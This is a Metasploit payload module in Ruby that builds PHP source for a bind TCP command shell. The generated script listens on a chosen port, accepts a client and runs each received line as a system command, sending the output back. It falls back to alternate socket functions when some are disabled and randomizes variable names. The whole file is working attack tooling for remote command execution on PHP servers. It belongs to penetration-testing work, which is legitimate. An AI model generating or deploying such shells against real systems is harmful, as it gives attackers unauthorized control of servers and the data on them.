##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # The size cannot be cached: the generated PHP source varies with the
  # LPORT value and the random variable name chosen in php_bind_shell.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php
  include Msf::Sessions::CommandShellOptions

  # Registers the payload's metadata with the framework.
  #
  # @param info [Hash] additional module info merged over the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'PHP Command Shell, Bind TCP (via PHP)',
        'Description' => 'Listen for a connection and spawn a command shell via php',
        'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>'],
        'License' => BSD_LICENSE,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  # Builds the PHP source of the bind shell.
  #
  # The emitted script binds to LPORT, accepts one client and then loops:
  # each line read from the socket (up to 2048 bytes, PHP_NORMAL_READ) is
  # either a `cd ` directory change, a `quit`/`exit` that ends the loop, or a
  # command handed to the block emitted by php_system_block, whose output is
  # written back to the socket. If socket_create_listen is unavailable or
  # listed in the disabled-functions variable, the script falls back to
  # socket_create/socket_bind/socket_listen.
  #
  # @return [String] the PHP source; LPORT is interpolated verbatim as an
  #   integer literal
  def php_bind_shell
    # Name of the PHP variable holding the disabled-functions list; it is
    # randomized on every generation. php_preamble is assumed to define it —
    # confirm against Msf::Payload::Php.
    disabled_var = "$#{Rex::Text.rand_text_alpha(4 + rand(4))}"

    # Heredoc content stays at column 0 so the generated PHP is byte-identical
    # regardless of this method's indentation.
    <<-PHP
#{php_preamble(disabled_varname: disabled_var)}
$port=#{datastore['LPORT']};

$scl='socket_create_listen';
if(is_callable($scl)&&!in_array($scl,#{disabled_var})){
$sock=@$scl($port);
}else{
$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
$ret=@socket_bind($sock,0,$port);
$ret=@socket_listen($sock,5);
}
$msgsock=@socket_accept($sock);
@socket_close($sock);

while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
{
$o = '';
$c=@socket_read($msgsock,2048,PHP_NORMAL_READ);
if(FALSE===$c){break;}
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
#{php_system_block(cmd_varname: '$c', output_varname: '$o', disabled_varname: disabled_var)}
}
@socket_write($msgsock,$o,strlen($o));
}
@socket_close($msgsock);
    PHP
  end

  # Assembles the final payload: whatever the superclass generates, followed
  # by the PHP bind shell source.
  #
  # @param _opts [Hash] generation options; not used by this module
  # @return [String]
  def generate(_opts = {})
    prefix = super
    prefix + php_bind_shell
  end
end